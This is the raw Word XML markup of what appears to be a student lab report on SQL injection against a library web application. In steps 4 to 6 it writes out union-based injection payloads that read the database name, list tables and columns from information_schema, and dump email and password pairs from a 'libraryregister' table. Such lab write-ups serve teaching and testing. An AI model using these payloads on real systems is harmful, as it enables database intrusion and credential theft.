          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:val="en" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>----Database name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>' union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,2,group_concat(database()),4,5 #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C387B1D" wp14:editId="1B980C73">
            <wp:extent cx="54673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67350" cy="1133475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRPr="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:val="en" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ind the names of table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRPr="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>' union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,2,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">),4,5 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>= database() #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRPr="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ind  the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> column names from particular table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRPr="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>' union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,2,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">),4,5 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>= "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>libraryregister</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>" #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRPr="00D228D6" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCC9E39" wp14:editId="4F7FFDD9">
            <wp:extent cx="5750805" cy="1762699"/>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20719" cy="1784129"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRDefault="006F2A49" w:rsidP="00D228D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04EA722D" wp14:editId="5656A745">
            <wp:extent cx="5728771" cy="1751682"/>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752520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRPr="00AA76DA" w:rsidRDefault="00AA76DA" w:rsidP="00AA76DA">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA76DA">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iq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection to display table name and its columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRPr="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ntries in the table to find email and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select 1,2,group_concat(email,0x3a,password),4,5 from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>libraryregister</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r w:rsidR="00620884" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23745D5B" wp14:editId="422E3364">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1" name="Rectangle 1" descr="SQL in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6245D79" id="Rectangle 1" o:spid="_x0000_s1026" alt="SQL in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W9HWfA&#10;AgAAzQUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAEyg&#10;6SzYAAAAAwEAAA8AAAAAAAAAAAAAAAAAGgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00620884" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00620884" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01765A2D" wp14:editId="346E1178">
                <wp:extent cx="300990" cy="300990"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3" name="Rectangle 3" descr="SQL in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E95B78A" id="Rectangle 3" o:spid="_x0000_s1026" alt="SQL injec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5Mu8&#10;kcECAADNBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA&#10;ca350dkAAAADAQAADwAAAAAAAAAAAAAAAAAbBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA&#10;8wAAACEGAAAAAA==&#10;" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00620884" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA0E702" wp14:editId="20CB28D5">
            <wp:extent cx="6059275" cy="155337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73855" cy="1557116"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA76DA" w:rsidRPr="00AA76DA" w:rsidRDefault="00AA76DA" w:rsidP="00AA76DA">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"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Fiq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA76DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA76DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA76DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection to display all entries of user email and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
